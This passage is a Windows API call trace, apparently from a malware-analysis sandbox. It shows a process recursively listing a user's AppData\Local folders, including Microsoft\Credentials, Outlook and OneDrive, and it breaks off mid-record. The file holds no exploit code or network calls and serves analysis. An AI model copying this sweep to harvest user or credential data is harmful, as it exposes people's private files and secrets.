returned 1 [0221.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f184) returned 1 [0221.558] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x31 [0221.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.559] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x31 [0221.559] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.568] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", lpFilePart=0x0) returned 0x28 [0221.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.569] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", lpFilePart=0x0) returned 0x28 [0221.569] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.570] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0221.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.570] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0221.571] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0221.571] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0221.572] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0221.572] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f174) returned 1 [0221.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f120) returned 1 [0221.572] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x36ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0221.572] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x36eed0 | out: lpFindFileData=0x36eed0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0221.573] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.573] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee90) returned 1 [0221.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0f0) returned 1 [0221.574] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x36 [0221.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.574] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x36 [0221.574] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.574] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.574] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.574] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.574] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x30 [0221.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.574] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x30 [0221.575] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, 